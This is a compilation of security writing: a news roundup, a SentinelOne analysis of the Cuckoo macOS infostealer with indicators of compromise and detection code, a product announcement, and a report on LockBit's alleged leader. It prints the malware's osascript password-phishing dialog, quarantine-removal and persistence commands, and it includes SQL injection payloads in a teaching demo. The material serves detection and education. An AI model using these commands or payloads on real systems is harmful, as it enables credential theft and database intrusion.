The Good, the Bad and the Ugly in Cybersecurity – Week 19

The Good | Russian-Based APT28 & LockBit Developer Condemned and Charged by International Enforcement

International law enforcement agencies took a hard stance against GRU-linked threat actors this week with the official condemnation of APT28 (aka Strontium, Fancy Bear, Forest Blizzard) and identification and sanctioning of LockBit ransomware’s administrator and developer.

NATO and the EU, joined by the U.S. and U.K., formally condemned the Russian threat group APT28 for a long-running cyber espionage campaign against European countries. Germany and the Czech Republic in particular highlighted last year's email-based attack on government agencies and on organizations in the military, aerospace and IT sectors in NATO member countries, NATO fast reaction corps, and Ukraine. APT28 has also targeted critical infrastructure in other EU member states.

The 2023 attack leveraged CVE-2023-23397, a zero-day vulnerability in Microsoft Outlook that leaks the victim's NTLM credential hash to an attacker-controlled server when Outlook processes a crafted message, with no user interaction required. The stolen credentials were used for lateral movement in victim networks and to exfiltrate sensitive emails from specific accounts. NATO called on the Russian state to “respect their international obligations and commitments to uphold international law and act within the framework for responsible state behavior in cyberspace.”

From the DoJ, the identity of the developer and administrator behind the notorious LockBit ransomware group has finally been unveiled. Russian national Dmitry Yuryevich Khoroshev (aka LockBitSupp and putinkrab) is also being sanctioned by various international enforcement agencies with the U.S. Department of State offering a reward up to $10 million for information leading to his arrest or conviction.

Khoroshev’s sanctioning follows the joint operation earlier this year disrupting LockBit ransomware infrastructure and operations. Before the seizure of its public-facing websites and servers, Khoroshev and his affiliates were instrumental in LockBit’s rise to one of the world’s most prolific ransomware variants and operations, worth billions of dollars in damages and loss.

Source: Reuters

The Bad | Novel Cuckoo Infostealer Exhibits Spyware Capabilities on macOS Devices

An emerging malware family dubbed “Cuckoo” is targeting Apple macOS devices, designed with the dual purpose of stealing information and acting as spyware. Cuckoo is a universal Mach-O binary capable of running on both Intel and Arm-based Macs. Observed distribution vectors show that the binary is hosted across a smattering of websites that claim to convert music from paid streaming services to MP3 files for download.

Cuckoo abuses osascript to prompt users for their system password and runs commands to gather sensitive data such as hardware information, currently running processes, and installed apps. It can also take screenshots and harvest data from iCloud Keychain (Apple’s password management system), Apple Notes, web browsers, crypto wallets, and popular apps like Steam, Telegram, and Discord.

Infostealers targeting macOS usually make no attempt to establish persistence, but persistence is crucial to spyware. Cuckoo persists through a LaunchAgent that runs when the user logs in and then every 60 seconds for as long as the user remains logged in.

New analysis from SentinelLabs reports a rise in Cuckoo samples and trojanized apps, with new ones appearing daily since the original Cuckoo stealer was first reported late last month. These trojanized apps advertise dubious services and are able to trick users past warnings from Apple Gatekeeper. SentinelLabs also confirms that at the time of writing, the latest version of XProtect (version 2194) is unable to block execution of Cuckoo malware. SentinelOne customers are protected from macOS Cuckoo Stealer.

As a best practice, users should always proceed with caution when downloading apps from unknown, third-party developers. With the rise in malware targeting macOS devices over the last few years, it is essential now to ensure that Macs are fully protected with an advanced security solution just like other operating systems.

The Ugly | Two New F5 Flaws Leave BIG-IP Next Central Manager Open to Remote Exploits & Device Takeover

Multi-cloud and application security vendor F5 has released fixes for two high-severity vulnerabilities found in BIG-IP Next Central Manager, the main component for controlling BIG-IP Next load balancers and app instances in both on-prem and cloud environments. Both CVE-2024-26026 (an SQL injection flaw) and CVE-2024-21793 (an OData injection flaw) could allow execution of attacker-supplied SQL statements on unpatched devices through the BIG-IP Next Central Manager API.

In an SQL injection attack, the attacker supplies input that the application concatenates into a query string, so that the database parses the attacker's text as part of the SQL statement rather than as data. This can lead to unauthorized access, data leakage, and even complete control over the database. These attacks are often leveraged to extract sensitive information or tamper with data within the database, posing significant risks to the security and integrity of the targeted web applications.
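As an added illustration of the flaw class (this is not F5's code and does not reproduce the BIG-IP Next Central Manager vulnerabilities, whose details are not on this page), the following Python snippet builds an in-memory SQLite table with constructed data and contrasts a lookup that splices user input into the SQL text with a parameterized one. The table, column and function names are assumptions for the example.

```python
import sqlite3

def make_db():
    """In-memory user table standing in for an appliance's account store (constructed data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, role TEXT)")
    conn.executemany("INSERT INTO users (username, role) VALUES (?, ?)",
                     [("alice", "admin"), ("bob", "viewer")])
    conn.commit()
    return conn

def find_user_vulnerable(conn, username):
    """Deliberately unsafe: the caller-controlled value becomes part of the SQL text."""
    sql = f"SELECT username, role FROM users WHERE username = '{username}'"
    return conn.execute(sql).fetchall()

def find_user_safe(conn, username):
    """Parameterized: the value is bound separately and is never parsed as SQL."""
    return conn.execute(
        "SELECT username, role FROM users WHERE username = ?", (username,)
    ).fetchall()

# Classic tautology: turns the WHERE clause into "'' OR '1'='1'", matching every row.
TAUTOLOGY = "' OR '1'='1"
# UNION-based extraction: appends a second SELECT against the schema table and
# comments out the closing quote, leaking table definitions through the same query.
SCHEMA_LEAK = "' UNION SELECT name, sql FROM sqlite_master --"

def demo():
    """Run both payloads through both lookups and return what each one yields."""
    conn = make_db()
    return {
        "vulnerable_tautology": find_user_vulnerable(conn, TAUTOLOGY),
        "vulnerable_schema_leak": find_user_vulnerable(conn, SCHEMA_LEAK),
        "safe_tautology": find_user_safe(conn, TAUTOLOGY),
        "safe_legit": find_user_safe(conn, "alice"),
    }

if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name:24} -> {rows}")
```

The vulnerable lookup returns every user for the tautology payload and the CREATE TABLE text for the UNION payload; the parameterized lookup returns nothing for either payload, because the whole string is compared against the username column as a literal value.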

Security researchers have noted how the vulnerabilities would first be exploited to obtain full administrative control of the Next Central Manager before creating rogue administrative accounts hidden from the Manager user interface (UI). These “invisible” accounts would then allow attackers to establish persistence in the environment, even if the legitimate admin account password was reset in the UI and the system patched. F5 has recommended its users to patch immediately, or to restrict Next Central Manager access to trusted users only over a secure network until the updates can be installed.

Source: Eclypsium

In the past two years, several critical-level F5 flaws have made headlines. One flaw from October 2023 in the BIG-IP configuration utility allowed remote code execution, and another from May 2022 was exploited against networks across government agencies and private sector organizations, prompting CISA to issue a warning to all affected Federal Civilian Executive Branch (FCEB) agencies.

macOS Cuckoo Stealer | Ensuring Detection and Defense as New Samples Rapidly Emerge

Infostealers targeting macOS devices have been on the rise for well over a year now, with variants such as Atomic Stealer (Amos), RealStealer (Realst), MetaStealer and others widely distributed in the wild through malicious websites, cracked applications and trojan installers. These past few weeks have seen a new macOS malware family appear that researchers have dubbed ‘Cuckoo Stealer’, drawing attention to its abilities to act both as an infostealer and as spyware.

In this post, we review Cuckoo Stealer’s main features and logic from a detection point of view and offer extended indicators of compromise to aid threat hunters and defenders. At the time of writing the latest version of XProtect, version 2194, does not block execution of Cuckoo Stealer malware. SentinelOne customers are protected from macOS Cuckoo Stealer.

More Cuckoo Stealers Appearing

Since the initial report on the emergence of this family of malware on April 30, we have seen a rise in new samples and trojanized applications from the initial four originally reported by Kandji to 18 unique trojanized applications at the time of writing, with new samples appearing daily.

The trojanized apps are various kinds of “potentially unwanted programs” offering dubious services such as PDF or music converters, cleaners and uninstallers; a full list appears in the IoCs at the end of this post. Examples include:

  • App Uninstaller.app
  • DumpMedia Amazon Music Converter.app
  • FoneDog Toolkit for Android on Mac.app
  • iMyMac PDF Compressor.app
  • PowerUninstall.app
  • TuneSolo Apple Music Converter.app

As reported previously, these applications contain a malicious binary in the MacOS folder named upd. The most recent binaries – in ‘fat’ and ‘thin’ versions for both Intel x86 and arm64 architectures – are ad hoc codesigned and their parent applications all share the same bundle identifier, upd.upd.

Apple’s codesign utility will provide identical output for all these samples:

codesign -dv file
…
Identifier=upd.upd
Format=Mach-O thin (x86_64)
CodeDirectory v=20400 size=1536 flags=0x2(adhoc) hashes=38+7 location=embedded
Signature=adhoc
Info.plist=not bound
TeamIdentifier=not set
Sealed Resources=none
Internal requirements count=0 size=12

Some protection is offered to unsuspecting users by Apple’s Gatekeeper, which will by default throw a warning that the application is not notarized. The malware authors have anticipated this and provided the user with instructions on how to run the application.

macOS Cuckoo Stealer Gatekeeper

The malware is written in C++ and was created in build 12B45b of Xcode, version 12.2, a rather old version that was released in November 2020, using a device still running macOS 11 Big Sur (build 20A2408) from the same year.

The code signature and the application’s Info.plist containing this information make current samples relatively easy to identify.

Simple Obfuscation Helps Cuckoo to Hide in Apple’s Nest

A noticeable characteristic of the malware is the heavy use of XOR’d strings in an attempt to hide its behavior from simple static signature scanners. The samples use different XOR keys (see the list of IoCs at the end of this post) of varying lengths to decrypt the main strings and functionality dynamically.

Though the binary is stripped and lacks function names, the decrypt routine is readily identifiable from the large number of cross references to it in the rest of the code. Current samples call the decrypt routine precisely 223 times.

Cuckoo decryption function

By breaking on this function in a debugger, it is relatively straightforward to output the decrypted strings to understand the malware’s behavior.

However, not all obfuscated strings are processed through this function. The decryption key and routine can be found independently in other places in the code as well.
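As an added example (not code from the original post and not the malware's own routine), the snippet below shows the kind of helper an analyst writes once the XOR keys are known: a repeating-key XOR and a brute-force pass that tries every observed key against an encrypted blob and keeps only decodings that are printable ASCII. It assumes a plain repeating-key XOR; the exact indexing of Cuckoo's decrypt routine is not reproduced here. The three keys are copied from the IoC list; the plaintexts and the ciphertexts derived from them are constructed for this example, not strings dumped from a sample.

```python
# Three of the XOR keys listed in the IoCs at the end of this post.
OBSERVED_KEYS = [
    "6neCM1yILp7V3BbMpgfgYYE6KY",
    "Hnyl2YPkOMLTNOndVtQwON",
    "LydNPzURb22Lxk4fxPkdd",
]

# Accept only printable ASCII (0x20..0x7e); control bytes mean the key was wrong.
PRINTABLE = set(range(0x20, 0x7F))

def xor_with_key(data: bytes, key: str) -> bytes:
    """Repeating-key XOR (assumed form of the routine); encrypts and decrypts alike."""
    k = key.encode("ascii")
    return bytes(b ^ k[i % len(k)] for i, b in enumerate(data))

def looks_printable(buf: bytes, min_len: int = 4) -> bool:
    return len(buf) >= min_len and all(b in PRINTABLE for b in buf)

def recover_strings(blob: bytes, keys):
    """Try each key against a blob; return (key, plaintext) pairs that decode cleanly."""
    out = []
    for key in keys:
        plain = xor_with_key(blob, key)
        if looks_printable(plain):
            out.append((key, plain.decode("ascii")))
    return out

# Constructed sample: plausible strings for this malware (a LOLBin path and the
# password drop file named later in the post), encrypted here with one observed key.
SAMPLE_PLAINTEXTS = ["/usr/bin/osascript", "pw.dat"]
SAMPLE_KEY = OBSERVED_KEYS[1]
SAMPLE_BLOBS = [xor_with_key(s.encode("ascii"), SAMPLE_KEY) for s in SAMPLE_PLAINTEXTS]

def demo():
    """Map each recovered plaintext to the key that decoded it."""
    results = {}
    for blob in SAMPLE_BLOBS:
        for key, text in recover_strings(blob, OBSERVED_KEYS):
            results[text] = key
    return results

if __name__ == "__main__":
    for text, key in demo().items():
        print(f"{key:40} -> {text}")
```

Wrong keys produce control bytes within the first few positions, so the printable filter rejects them; in a real analysis the same loop is run over every encrypted blob referenced by the 223 call sites rather than over two constructed ones.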

One of the few unobfuscated strings in the current binary is an array of file extensions, indicating the kind of information the malware authors are interested in stealing.

{"txt", "rtf", "doc", "docx", "xls", "xlsx", "key", "wallet", "jpg", "dat", "pdf", "pem", "asc", "ppk", "rdp", "sql", "ovpn", "kdbx", "conf", "json"}

Looking for cross references to ‘wallet’ (one of the items in the array), we find the array is consumed in a function which calls both the decrypt function and another function that implements the same XOR routine and key.

macOS Cuckoo in function decryption

In radare2, we can find all references to the XOR key via grepping the output of the ax command for the string’s address.

Finding cross references in radare2

Cuckoo Stealer Observable Behavior

Despite these attempts at obfuscation, analysis of Cuckoo Stealer reveals that, unsurprisingly, it uses many of the same techniques as other infostealers we have encountered in the last 12 months or so. In particular, it makes various uses of AppleScript to duplicate files and folders of interest and to steal the user’s admin password in plain text.

SentinelOne detects Cuckoo stealer

This is achieved through a simple AppleScript dialog using the “hidden answer” option, a ploy that macOS attackers have been using since at least 2008, as we observed recently in relation to Atomic Stealer.

With Cuckoo Stealer, if the user enters anything other than a valid admin password, the malware will repeatedly display the dialog until the right password is provided. This remains true even if the user presses the ‘Cancel’ button.

The underlying mechanism for how the password is checked was nicely elucidated by Kandji researchers here. The scraped password is then saved in clear text in a file named pw.dat in a hidden subfolder of the User’s home directory. The hidden folder’s name is a combination of .local- and a randomly generated UUID identifier. For example:

~/.local-6635DD81-94DD-59E3-9D84-20BD41C51999/

The following regexes can be used to find paths or commands containing this pattern (the second form avoids the POSIX [[:xdigit:]] bracket class, which engines such as Python's re module do not support):

.local-[[:xdigit:]]{8}-[[:xdigit:]]{4}-[[:xdigit:]]{4}-[[:xdigit:]]{4}-[[:xdigit:]]{12}/

// alternatively:
.local-[0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12}/

In addition, the malware also attempts to install a persistence LaunchAgent with the label com.user.loginscript. The name of the property list file itself will take the form of the parent application bundle. For example, the trojan DumpMedia Spotify Music Converter.app will create a plist called ~/Library/LaunchAgents/com.dumpmedia.spotifymusicconverter.plist, while iMyMac Video Converter.app will write the same plist out as com.immyac.videoconverter.plist.

Cuckoo Stealer Launch Agent

This persistence agent will point to a copy of the upd binary located in the same hidden .local- directory mentioned above.

The malware also makes use of several Living Off the Land utilities including xattr, osascript and system_profiler for discovery.

Observed commands and arguments:

awk /Hardware UUID/{print $(NF)}
launchctl load -w "/Users/user1/Library/LaunchAgents/com.dumpmedia.spotifymusicconverter.plist"
osascript -e 'display dialog "macOS needs to access System Settings" default answer "" with title "System Preferences" with icon caution with hidden answer'
system_profiler SPHardwareDataType | awk '/Hardware UUID/{print $(NF)}'
xattr -d com.apple.quarantine "/Users/user1/.local-6635DD81-94DD-59E3-9D84-20BD41C51999/DumpMediaSpotifyMusicConverter"

Cuckoo Stealer execution chain
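Pulling together the hunting points above (the upd.upd ad hoc code signature, the .local-UUID regex, the com.user.loginscript LaunchAgent and the living-off-the-land command lines), the following Python snippet is an added example, not part of the original post, of how those indicators can be checked from telemetry. The command lines, plist and codesign output it runs over are constructed here in the shape the post describes, with an illustrative user name and UUID, not captured from a real host; the function names are assumptions for the example.

```python
import plistlib
import re

# Hidden working directory: ".local-" followed by a UUID (second regex from the post).
LOCAL_UUID_RE = re.compile(
    r"\.local-[0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12}/"
)
LAUNCH_AGENT_LABEL = "com.user.loginscript"
BUNDLE_ID = "upd.upd"

def classify_command(cmd):
    """Return the Cuckoo-style indicators present in one process command line."""
    hits = []
    if LOCAL_UUID_RE.search(cmd):
        hits.append("path inside hidden .local-<UUID> directory")
    if "osascript" in cmd and "hidden answer" in cmd:
        hits.append("AppleScript password prompt with hidden answer")
    if cmd.startswith("xattr -d com.apple.quarantine"):
        hits.append("quarantine attribute removed")
    if "SPHardwareDataType" in cmd and "Hardware UUID" in cmd:
        hits.append("hardware UUID discovery")
    if cmd.startswith("launchctl load") and "/Library/LaunchAgents/" in cmd:
        hits.append("user LaunchAgent loaded")
    return hits

def inspect_launch_agent(plist_bytes):
    """Flag a LaunchAgent whose label, program path or schedule matches the Cuckoo pattern."""
    data = plistlib.loads(plist_bytes)
    program = data.get("Program") or " ".join(data.get("ProgramArguments", []))
    findings = []
    if data.get("Label") == LAUNCH_AGENT_LABEL:
        findings.append("label " + LAUNCH_AGENT_LABEL)
    if LOCAL_UUID_RE.search(program):
        findings.append("program inside hidden .local-<UUID> directory")
    if data.get("RunAtLoad") and data.get("StartInterval") == 60:
        findings.append("runs at login and every 60 seconds")
    return findings

def inspect_codesign(text):
    """Parse `codesign -dv` output and flag the upd.upd ad hoc signature described above."""
    fields = dict(line.split("=", 1) for line in text.splitlines() if "=" in line)
    findings = []
    if fields.get("Identifier") == BUNDLE_ID:
        findings.append("bundle identifier " + BUNDLE_ID)
    if fields.get("Signature") == "adhoc" and fields.get("TeamIdentifier") == "not set":
        findings.append("ad hoc signature with no Team ID")
    return findings

# --- Constructed sample inputs (modelled on the post, not captured from a real host) ---
SAMPLE_COMMANDS = [
    "launchctl load -w /Users/user1/Library/LaunchAgents/com.dumpmedia.spotifymusicconverter.plist",
    "osascript -e 'display dialog \"macOS needs to access System Settings\" default answer \"\" "
    "with title \"System Preferences\" with icon caution with hidden answer'",
    "system_profiler SPHardwareDataType | awk '/Hardware UUID/{print $(NF)}'",
    "xattr -d com.apple.quarantine /Users/user1/.local-6635DD81-94DD-59E3-9D84-20BD41C51999/DumpMediaSpotifyMusicConverter",
    "ls -la /Users/user1/Documents",  # benign control line
]

SAMPLE_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0">
<dict>
  <key>Label</key><string>com.user.loginscript</string>
  <key>ProgramArguments</key>
  <array><string>/Users/user1/.local-6635DD81-94DD-59E3-9D84-20BD41C51999/DumpMediaSpotifyMusicConverter</string></array>
  <key>RunAtLoad</key><true/>
  <key>StartInterval</key><integer>60</integer>
</dict>
</plist>
"""

SAMPLE_CODESIGN = """Identifier=upd.upd
Format=Mach-O thin (x86_64)
CodeDirectory v=20400 size=1536 flags=0x2(adhoc) hashes=38+7 location=embedded
Signature=adhoc
Info.plist=not bound
TeamIdentifier=not set
"""

def run_all():
    """Run every check over the constructed samples, keyed by the command's first word."""
    return {
        "commands": {cmd.split()[0]: classify_command(cmd) for cmd in SAMPLE_COMMANDS},
        "launch_agent": inspect_launch_agent(SAMPLE_PLIST),
        "codesign": inspect_codesign(SAMPLE_CODESIGN),
    }

if __name__ == "__main__":
    for section, result in run_all().items():
        print(section, result)
```

None of these checks is conclusive on its own (ad hoc signatures and user LaunchAgents are common on developer machines), but a quarantine removal or LaunchAgent program path inside a .local-UUID directory, combined with the hidden-answer osascript prompt, is a strong enough combination to pivot on in EDR telemetry.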

SentinelOne Protects Against Cuckoo Stealer

SentinelOne Singularity detects Cuckoo Stealer and prevents its execution when the policy is set to Protect/Protect. In Detect mode, the agent will allow analysts to observe and investigate malicious behavior, as shown below.

SentinelOne Console detects Cuckoo Stealer

Agent version 23.4.1.7125 and later offer an extensive set of behavioral indicators including reference to MITRE TTPs specific to macOS infostealers.

Conclusion

The actors behind the Cuckoo Stealer campaign have clearly invested some resources into developing a novel infostealer rather than buying any of the ready-made offerings currently circulating in various Telegram channels and darknet forums. This, along with the rising numbers of samples we have observed since initial reporting of this threat, suggests that we will likely see further variants of this malware in the future.

Enterprises are advised to use a third party security solution such as SentinelOne Singularity to ensure that devices are protected against this and other threats targeting macOS devices in the fleet.

To learn more about how SentinelOne can help protect your organization, contact us or request a free demo.

Indicators of Compromise

Bundle Identifier
upd.upd

Observed Application Names
App Uninstaller.app
DumpMedia Amazon Music Converter.app
DumpMedia DeezPlus.app
DumpMedia Pandora Music Converter.app
DumpMedia Spotify Music Converter.app
DumpMedia Video Converter.app
DumpMedia YouTube Music Converter.app
FoneDog Data Recovery.app
FoneDog iPhone Cleaner.app
FoneDog PDF Compressor.app
FoneDog Toolkit for Android on Mac.app
FoneDog Toolkit for iOS on Mac.app
FoneDog Video Converter.app
iMyMac PDF Compressor.app
iMyMac Video Converter.app
PowerUninstall.app
TunesFun Apple Music Converter.app
TuneSolo Apple Music Converter.app

Observed Mach-Os (SHA1)
04a572b2a17412bba6c875a43289aac521f7b98d
0e3e58a2b19072823df2ec52f09e51acf0d0d724
127c486eab9398a2f42208d96aa12dd8fcfb68b5
1ef1f94d39931b6e625167b021a718f3cfe6bb80
1f49bb334ebcec6b2493d157caf90a8146fb68d9
219f57e9afe201ad4088340cd5b191223d4c4227
24c311abe5d93d21172a6928ba3a211528aa04f9
266f48c38efbb5a6d49fb74194c74fe68d02d62a
298c9ab225d7262a2106bc7bec0993eaa1210a0d
2a422057790bae755c3225aff3e47977df234b11
2c7ec5358b69f8e36c35c53501e4ba6efce25689
2cdda89c50c2aa1eb4b828350b7086748c58fe08
35d75565de813e89a765718ed31c1bfebfd3c11c
4cf895c391557498d2586cee3ace3c32a3a83a4e
4cfdf872051900df8a959b95a03f6c906ad4596e
50360b325aad398a5d580a2adc9aef597eb98855
5220a53c1930ea93849caa88850cb6628a06cd90
57a1f3d3cbbc33b92177660ee620bff4f1c5b229
63eb1abe69b11c8ae04092ccf822633d1e1ff648
69c6c1f09f8a1ad61f1c48527ff27e56847a716f
6aba0ebabccea1902ba2ab7ac183a4bd22617555
71fddbccb15904b14b5773e689f611bfd5a0d111
82c70c956f5f66cf642991285fd631a9094abbf4
873fd2fc21457e707832c859534d596a7c803a46
8bab36fe676c8296ef3889d5ef0afcc4b3f017f3
8bc02ae4262eaf2cbb2454709db7f95cebcc9432
8bee44d0e4e22d3a85cfb9d00d00cb7d85433c9d
8c10459be56dde03c75cda993a489373a8251abf
9ac058d4541aa0e7ba222d25c55c407451f318a7
9d4b45104b3eb3734cb0ba45ca365b95a4c88505
9efa91a0cba44334b1071344314853699155814f
ac755f6da9877a4fc161d666f866a1d82e6de1b0
ac948abaa90b4f1498e699706407ac0c6d4164c7
b49a69fa41a2d7f5f81dbc2be9ea7cfc45c1f3df
b4bd11aa174d1a2f75aff276a2f9c50c4b6a4a1d
b4da5459ccd0556357f8ccd3471a63eebfa6e3b7
b65880c2aecc15db8afa80f027ed0650be23e8f9
bd5cdf05db06c3a81b0509e9f85c26feb34cea81
c5c8335ed343d14d2150a9ba90e182ca739bde8a
c8a6e4a3b16adf5be7c37b589d36cb2bd9706a92
c98d92e01423800404c77f6f82d62e5e7516d46d
cd04a6df24ab7852267619d388dee17f20c66deb
cf069bcafb6510282c8aeab7282e19abc46d558f
db180e1664e566a3393d884a52b93b35bb33911e
db19034d60973d0bcaa237c24252fe969803bc7c
dfed0ca9d883a45a40b2c23c29557ac4679ef698
e57b537f5f3307c6c59f5477e6320f17a9ba5046
e68f0f0e6102a1cd78d5d32ec7807b2060d08f79
e6fa7fcbaf339df464279b8090f6908fed7b325a
e9180ee202c42e2b94689c7e3fb2532dd5179fad
ecca309e0b43cd7f4517a863b95abf7b89be4584
f4999331606b753daaf6d6ad84917712f1420c85
f6e9081e36ca28bf619aebb40a67c56a2de2806e
fad49cac81011214d7fe3db7fc0bd663ef7bb353

Observed XOR Keys
0dhIscuDmR6xn3VMAG9ZYjBKC4VDeXGbyDyWjHM
4E72G6aXPne5ejcUgAfae6khJB3c871V0QUmkI
6neCM1yILp7V3BbMpgfgYYE6KY
7ricF8bWO0eBNiKEravcj2iIXohSNt
7Y9lGDAyEf9vxEmFgRqpDwYM52NFPbsUc
GXMSjRLvCPrrFnc1xa3xvYd43DfM8
HhvDDxmmfm7QuLH4rP63Fzn2eyW5BzuM3N
Hnyl2YPkOMLTNOndVtQwON
JB3k62Vtqymx09aJtnF9lZrCeIc
JsGqCdROAT1VDpSnxrAyZY45uQvRFP
LydNPzURb22Lxk4fxPkdd
MTGpOAycVm9btlQyEa5xVQPiz
Qmi5gstd6Oc27AJLXJQtEqGMxXzHUx
QssogTgvuTaZzPYZQynw0d
aZeTZw0X2lXM083cgmJQvnmCn9kmt
coOwAdmPtzt5Ps9rvUGOMEeFYajX2nJaismV
rzdbcSkVHXHefChUJQFGjAm12oinXwlyH2sHfiY
vLiOnPSKZ1bqjlp1dwuDvmmeQ3QN


Think Like an Attacker with SentinelOne’s Cloud Native Security (CNS)

SentinelOne is very excited to announce the general availability (GA) of Singularity Cloud Native Security!

Cloud Native Security (CNS), our agentless Cloud Native Application Protection Platform (CNAPP) based on our recent PingSafe acquisition, is now integrated into the Singularity Platform and available to new and existing customers via our unified security console, the Singularity Operations Center. If you’re a new customer, we’d love to show you how CNS improves cloud security.

This announcement reinforces our continuous commitment to deliver security innovation to our customers. General availability of CNS comes within the first 100 days post-acquisition (we’re at Day 94!) and we are pleased to say that SentinelOne customers can now access these critical capabilities to help them radically reduce their cloud attack surface and improve their cloud security posture.

“SentinelOne CNS has been a value add for Observe.AI from day one. Its offensive security engine is one of a kind and a big differentiator. As soon as we onboarded SentinelOne CNS for proof of value, it not only reduced the noise that was evident with other scanners, but it also helped prioritize security issues, saving countless hours for developers and security engineers.

Its offensive security approach can be an eye-opener for infrastructure teams, providing deeper insights into the external cloud attack surface. I highly recommend SentinelOne CNS for securing cloud resources.” Krutin Karia, Head of Security, Observe.AI

Prioritizing Cloud Health Through Evidence-Based Security

With rapid agentless onboarding across 6 different cloud environments, Cloud Native Security consolidates and correlates a range of cloud security capabilities:

  • Rapid onboarding with multi-cloud support
  • Cloud Asset Inventory and mapping with easy-to-understand graph visualizations
  • Vulnerability Scanning
  • Cloud Security Posture Management (CSPM)
  • Secrets Scanning
  • Infrastructure as Code (IaC) Scanning, including VCS integration
  • Container Image Security, including CI/CD integration
  • Software Bill of Materials (SBOM)
  • Kubernetes Security Posture Management (KSPM)
  • Cloud Detection and Response (CDR)
  • Integration with Singularity Data Lake for accelerated investigations via Purple AI

Cloud Native Security leverages a unique attacker’s mindset to identify and verify risks that require immediate attention and action.

Cloud Native Security is powered by the Offensive Security Engine™, which delivers crucial value and an industry-first for customers: Verified Exploit Paths™. Where cloud alerts typically consist of overwhelming noise, are time-intensive to validate, and prone to false positives, the Offensive Security Engine differentiates between theoretical and exploitable risks by providing proof of exploitability with each alert.


This evidence-based approach to prioritization and alert validation surfaces remediation opportunities for security practitioners to immediately and concretely increase their cloud security posture. This is another key innovation from SentinelOne that empowers security practitioners by minimizing dependence on human vetting.

By combining the agentless Cloud Native Security alongside our hyper-performant, user-mode agent-based Cloud Workload Security and Cloud Data Security, customers can enjoy visibility and security controls from code to cloud, with powerful capabilities to prevent, detect, and respond across the cloud lifecycle.

Learn More

This is SentinelOne’s comprehensive CNAPP vision – agentless and agent-based cloud security combined to provide the world’s most powerful AI-powered cloud threat protection. Learn more about SentinelOne’s Cloud Security portfolio here or book a demo with our expert team today.


U.S. Charges Russian Man as Boss of LockBit Ransomware Group

The United States joined the United Kingdom and Australia today in sanctioning 31-year-old Russian national Dmitry Yuryevich Khoroshev as the alleged leader of the infamous ransomware group LockBit. The U.S. Department of Justice also indicted Khoroshev and charged him with using LockBit to attack more than 2,000 victims and extort at least $100 million in ransomware payments.

Image: U.K. National Crime Agency.

Khoroshev (Дмитрий Юрьевич Хорошев), a resident of Voronezh, Russia, was charged in a 26-count indictment by a grand jury in New Jersey.

“Dmitry Khoroshev conceived, developed, and administered Lockbit, the most prolific ransomware variant and group in the world, enabling himself and his affiliates to wreak havoc and cause billions of dollars in damage to thousands of victims around the globe,” U.S. Attorney Philip R. Sellinger said in a statement released by the Justice Department.

The indictment alleges Khoroshev acted as the LockBit ransomware group’s developer and administrator from its inception in September 2019 through May 2024, and that he typically received a 20 percent share of each ransom payment extorted from LockBit victims.

The government says LockBit victims included individuals, small businesses, multinational corporations, hospitals, schools, nonprofit organizations, critical infrastructure, and government and law-enforcement agencies.

“Khoroshev and his co-conspirators extracted at least $500 million in ransom payments from their victims and caused billions of dollars in broader losses, such as lost revenue, incident response, and recovery,” the DOJ said. “The LockBit ransomware group attacked more than 2,500 victims in at least 120 countries, including 1,800 victims in the United States.”

The unmasking of LockBitSupp comes nearly three months after U.S. and U.K. authorities seized the darknet websites run by LockBit, retrofitting them with press releases about the law enforcement action and free tools to help LockBit victims decrypt infected systems.

The feds used the existing design on LockBit’s victim shaming website to feature press releases and free decryption tools.

One of the blog captions that authorities left on the seized site was a teaser page that read, “Who is LockbitSupp?,” which promised to reveal the true identity of the ransomware group leader. That item featured a countdown clock until the big reveal, but when the site’s timer expired no such details were offered.

Following the FBI’s raid, LockBitSupp took to Russian cybercrime forums to assure his partners and affiliates that the ransomware operation was still fully operational. LockBitSupp also raised another set of darknet websites that soon promised to release data stolen from a number of LockBit victims ransomed prior to the FBI raid.

One of the victims LockBitSupp continued extorting was Fulton County, Ga. Following the FBI raid, LockBitSupp vowed to release sensitive documents stolen from the county court system unless paid a ransom demand before LockBit’s countdown timer expired. But when Fulton County officials refused to pay and the timer expired, no stolen records were ever published. Experts said it was likely the FBI had in fact seized all of LockBit’s stolen data.

LockBitSupp also bragged that their real identity would never be revealed, and at one point offered to pay $10 million to anyone who could discover their real name.

KrebsOnSecurity has been in intermittent contact with LockBitSupp for several months over the course of reporting on different LockBit victims. Reached at the same ToX instant messenger identity that the ransomware group leader has promoted on Russian cybercrime forums, LockBitSupp claimed the authorities named the wrong guy.

“It’s not me,” LockBitSupp replied in Russian. “I don’t understand how the FBI was able to connect me with this poor guy. Where is the logical chain that it is me? Don’t you feel sorry for a random innocent person?”

LockBitSupp, who now has a $10 million bounty on his head from the U.S. Department of State, has been known to be flexible with the truth. The Lockbit group routinely practiced “double extortion” against its victims — requiring one ransom payment for a key to unlock hijacked systems, and a separate payment in exchange for a promise to delete data stolen from its victims.

But Justice Department officials say LockBit never deleted its victims’ data, regardless of whether those organizations paid a ransom to keep the information from being published on LockBit’s victim shaming website.

Khoroshev is the sixth person officially indicted as an active member of LockBit. The government says Russian national Artur Sungatov used LockBit ransomware against victims in manufacturing, logistics, insurance and other companies throughout the United States.

Ivan Gennadievich Kondratyev, a.k.a. “Bassterlord,” allegedly deployed LockBit against targets in the United States, Singapore, Taiwan, and Lebanon. Kondratyev is also charged with three criminal counts arising from his alleged use of the Sodinokibi (aka “REvil”) ransomware variant to encrypt data, exfiltrate victim information, and extort a ransom payment from a corporate victim based in Alameda County, California.

In May 2023, U.S. authorities unsealed indictments against two alleged LockBit affiliates, Mikhail “Wazawaka” Matveev and Mikhail Vasiliev. In January 2022, KrebsOnSecurity published Who is the Network Access Broker ‘Wazawaka,’ which followed clues from Wazawaka’s many pseudonyms and contact details on the Russian-language cybercrime forums back to a 31-year-old Mikhail Matveev from Abaza, RU.

Matveev remains at large, presumably still in Russia. Meanwhile, the U.S. Department of State has a standing $10 million reward offer for information leading to Matveev’s arrest.

Vasiliev, 35, of Bradford, Ontario, Canada, is in custody in Canada awaiting extradition to the United States (the complaint against Vasiliev is at this PDF).

